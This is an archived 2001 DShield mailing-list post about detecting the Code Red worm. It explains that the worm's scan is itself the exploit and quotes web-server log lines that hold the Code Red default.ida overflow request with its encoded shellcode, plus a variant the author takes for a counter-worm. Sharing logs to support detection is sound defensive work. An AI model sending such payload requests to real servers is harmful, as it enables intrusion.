[Dshield] Code Red Host Scans (and more)

John Groseclose iain at caradoc.org
Sat Aug 4 15:31:52 GMT 2001


At 6:41 PM -0400 8/2/01, Tim Dwayne Southard wrote:
My IDS (Cisco Secure) is not detecting the host scans from infected 
machines.  I can see the default.ida?NNN stuff but I think that is 
the second stage (infection).  I need to see the port 80 scans 
regardless of whether they are scanning MS boxes.  Any assistance 
will be repaid with good Karma.

The "scan" *is* the "exploit." Code Red doesn't check first to see if 
you're running IIS before attempting to infect. There are no primary 
or secondary stages to the Code Red worm - it either infects your 
machine, or it doesn't.

The weirder part is this... A "normal" Code Red attempt looks like this:

cx215003-b.wwck1.ri.home.com - - [01/Aug/2001:04:31:50 -0700] "GET 
/default.ida?
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucb
d3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3
%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 324 "-" "-"

Since 12:44:09 GMT, I've been receiving *these* in my logs:

h-64-105-129-178.lsancaba.covad.net - - [04/Aug/2001:05:44:09 -0700] 
"GET /defau
lt.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6
858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u819
0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 277 "-" "-"
www.sacramentochats.com - - [04/Aug/2001:06:08:15 -0700] "GET 
/default.ida?XXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7
801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u000
3%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 277 "-" "-"

It *looks* like the second worm is trying to reboot the machine via 
an exploit for cmd.exe, but since I don't have any Windows machines 
around to work with, I can't really do any experimentation with it. 
Perhaps someone wrote a "counter-worm."
-- 
John Groseclose
iain at caradoc.org




More information about the list mailing list